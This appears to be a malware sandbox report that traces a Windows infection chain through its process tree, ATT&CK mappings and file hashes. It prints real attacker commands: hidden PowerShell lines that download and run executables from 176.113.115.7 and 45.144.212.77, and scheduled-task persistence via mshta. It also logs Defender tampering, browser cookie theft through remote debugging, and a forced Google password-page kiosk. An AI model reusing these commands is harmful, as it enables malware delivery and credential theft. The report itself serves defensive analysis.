wrote to memory of 1416 1668 914e8f44cd.exe 103 PID 1668 wrote to memory of 3528 1668 914e8f44cd.exe 104 PID 1668 wrote to memory of 3528 1668 914e8f44cd.exe 104 PID 1668 wrote to memory of 3528 1668 914e8f44cd.exe 104 PID 1416 wrote to memory of 5868 1416 cmd.exe 106 PID 1416 wrote to memory of 5868 1416 cmd.exe 106 PID 1416 wrote to memory of 5868 1416 cmd.exe 106 PID 3528 wrote to memory of 5796 3528 mshta.exe 107 PID 3528 wrote to memory of 5796 3528 mshta.exe 107 PID 3528 wrote to memory of 5796 3528 mshta.exe 107 PID 5796 wrote to memory of 1140 5796 powershell.exe 109 PID 5796 wrote to memory of 1140 5796 powershell.exe 109 PID 5796 wrote to memory of 1140 5796 powershell.exe 109 PID 1064 wrote to memory of 668 1064 rapes.exe 110 PID 1064 wrote to memory of 668 1064 rapes.exe 110 PID 1064 wrote to memory of 668 1064 rapes.exe 110 PID 668 wrote to memory of 672 668 cmd.exe 112 PID 668 wrote to memory of 672 668 cmd.exe 112 PID 668 wrote to memory of 672 668 cmd.exe 112 PID 668 wrote to memory of 340 668 cmd.exe 113 PID 668 wrote to memory of 340 668 cmd.exe 113 PID 668 wrote to memory of 340 668 cmd.exe 113 PID 340 wrote to memory of 1768 340 cmd.exe 114 PID 340 wrote to memory of 1768 340 cmd.exe 114 PID 340 wrote to memory of 1768 340 cmd.exe 114 PID 668 wrote to memory of 5216 668 cmd.exe 115 PID 668 wrote to memory of 5216 668 cmd.exe 115 PID 668 wrote to memory of 5216 668 cmd.exe 115 PID 5216 wrote to memory of 2128 5216 cmd.exe 116 PID 5216 wrote to memory of 2128 5216 cmd.exe 116 PID 5216 wrote to memory of 2128 5216 cmd.exe 116 PID 668 wrote to memory of 3800 668 cmd.exe 117 PID 668 wrote to memory of 3800 668 cmd.exe 117 PID 668 wrote to memory of 3800 668 cmd.exe 117 PID 3800 wrote to memory of 4360 3800 cmd.exe 118 PID 3800 wrote to memory of 4360 3800 cmd.exe 118 PID 3800 wrote to memory of 4360 3800 cmd.exe 118 PID 1064 wrote to memory of 6128 1064 rapes.exe 119 PID 1064 wrote to memory of 6128 1064 rapes.exe 119 PID 1064 wrote to memory of 6128 1064 rapes.exe 119 PID 6128 wrote to memory of 3944 6128 cmd.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe"C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn oPnZKmaa8hW /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjd3Pec9I.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn oPnZKmaa8hW /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjd3Pec9I.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6100
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Bjd3Pec9I.hta3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5336 -
C:\Users\Admin\AppData\Local\TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE"C:\Users\Admin\AppData\Local\TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Users\Admin\AppData\Local\Temp\10106670101\914e8f44cd.exe"C:\Users\Admin\AppData\Local\Temp\10106670101\914e8f44cd.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn fwNcOmaKEHZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\SX6Qm0cMz.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn fwNcOmaKEHZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\SX6Qm0cMz.hta" /sc minute /mo 25 /ru "Admin" /f9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5868
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\SX6Qm0cMz.hta8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5796 -
C:\Users\Admin\AppData\Local\TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE"C:\Users\Admin\AppData\Local\TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1140
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5216 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "bsVfSmaNUhK" /tr "mshta \"C:\Temp\b0smxeTLR.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2528
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\b0smxeTLR.hta"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3152
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106761121\PcAIvJ0.cmd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4316 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\igyaav0g\igyaav0g.cmdline"10⤵
- System Location Discovery: System Language Discovery
PID:1120 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C06.tmp" "c:\Users\Admin\AppData\Local\Temp\igyaav0g\CSCFCC18FDBAB43401994288CE1E72E30D4.TMP"11⤵
- System Location Discovery: System Language Discovery
PID:6136
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\dll32.exe"C:\Users\Admin\AppData\Local\Temp\dll32.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp4E16.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp4E16.tmp.bat9⤵PID:1992
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:5524
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4492"10⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\system32\find.exefind ":"10⤵PID:5776
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak10⤵
- Delays execution with timeout.exe
PID:3352
-
-
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5960 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu11⤵
- Uses browser remote debugging
- Suspicious use of AdjustPrivilegeToken
PID:4588 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffefe99cc40,0x7ffefe99cc4c,0x7ffefe99cc5812⤵PID:4616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1460,i,11574437410097838983,8252995882691849115,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1444 /prefetch:212⤵PID:5296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1764,i,11574437410097838983,8252995882691849115,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1760 /prefetch:312⤵PID:2436
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106970101\6c0e2e5698.exe"C:\Users\Admin\AppData\Local\Temp\10106970101\6c0e2e5698.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5160 -
C:\Users\Admin\AppData\Local\Temp\WZLW29H72194G4Y5.exe"C:\Users\Admin\AppData\Local\Temp\WZLW29H72194G4Y5.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106980101\830c86897e.exe"C:\Users\Admin\AppData\Local\Temp\10106980101\830c86897e.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4864
-
-
C:\Users\Admin\AppData\Local\Temp\10106990101\0ec1f6fe15.exe"C:\Users\Admin\AppData\Local\Temp\10106990101\0ec1f6fe15.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4584 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:592
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking8⤵PID:2236
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking9⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:340 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {528968c8-3c60-4503-ab36-1aee0d960f1b} 340 "\\.\pipe\gecko-crash-server-pipe.340" gpu10⤵PID:4124
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35897b5a-7954-4c0a-8dc3-d5ebc580535b} 340 "\\.\pipe\gecko-crash-server-pipe.340" socket10⤵PID:4424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3224 -childID 1 -isForBrowser -prefsHandle 3236 -prefMapHandle 3252 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c71d154-9624-4ebf-b6d2-26198de67909} 340 "\\.\pipe\gecko-crash-server-pipe.340" tab10⤵PID:2836
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3912 -prefMapHandle 2856 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5f74ba7-5b7b-41c0-a3ba-b20743cabed2} 340 "\\.\pipe\gecko-crash-server-pipe.340" tab10⤵PID:5888
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4728 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 32844 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d924a22c-1715-436a-beb0-56c55f026819} 340 "\\.\pipe\gecko-crash-server-pipe.340" utility10⤵
- Checks processor information in registry
PID:3224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 3 -isForBrowser -prefsHandle 5368 -prefMapHandle 4152 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {41aa79c7-a5c2-48b6-98f8-1eb1e0750e25} 340 "\\.\pipe\gecko-crash-server-pipe.340" tab10⤵PID:3616
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5584 -childID 4 -isForBrowser -prefsHandle 5504 -prefMapHandle 5508 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b6b1c9c-18bb-4ef3-baa6-bdc9c6a87be4} 340 "\\.\pipe\gecko-crash-server-pipe.340" tab10⤵PID:4976
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5712 -childID 5 -isForBrowser -prefsHandle 5788 -prefMapHandle 5784 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a60b8380-18bc-4d6f-b75c-d0946c6cce5c} 340 "\\.\pipe\gecko-crash-server-pipe.340" tab10⤵PID:116
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107000101\50fb815cca.exe"C:\Users\Admin\AppData\Local\Temp\10107000101\50fb815cca.exe"7⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
C:\Users\Admin\AppData\Local\Temp\10107010101\ktxzLhN.exe"C:\Users\Admin\AppData\Local\Temp\10107010101\ktxzLhN.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4020 -
C:\Users\Admin\AppData\Local\Temp\dll32.exe"C:\Users\Admin\AppData\Local\Temp\dll32.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:180
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4556
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1248
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
1KB
MD5a4423aad2b5496e1f5232802e3325b24
SHA11f7f15c374d2fc57731a67beab699566082f356b
SHA25669cf0ffe10f4626bb62c4518e96ccb249e205a3b3d5452ba0cba96fab0eb83fe
SHA512da4466df6250f71522bb3cfc6e625812e99f708e72dc22becee604aa4e7991c21cef8fe6c5a0b5e8a116caa5bcb3d42ee1649e5acc818949d05601c29e555e2d
-
Filesize
425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA5121a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
16KB
MD52f0c23470abb49eca9fa7fa01d3e2bc7
SHA12f075eb81a6285f688f55ef30f4a12db208e51c7
SHA256c5537d00892d85d76ce5de471cbcc7c3c34a2010c61250c4ac8c71ba06686492
SHA512ee9485e6859132d28b723e96db68bf51fec36b0b5ef28efa9805e2748f413f4e763520a1480bacecc4dddc2087fcbaeebd3cd598fd0aa04def766794aca781d7
-
Filesize
17KB
MD5fa774423471be1fd98c72d272571fcf1
SHA1b663426f666ad101e6437d011dee214c4f80a5de
SHA256140acb23e5dfbaef3b5cd0db22159da12fd41d079f4653e23f93145c80feab54
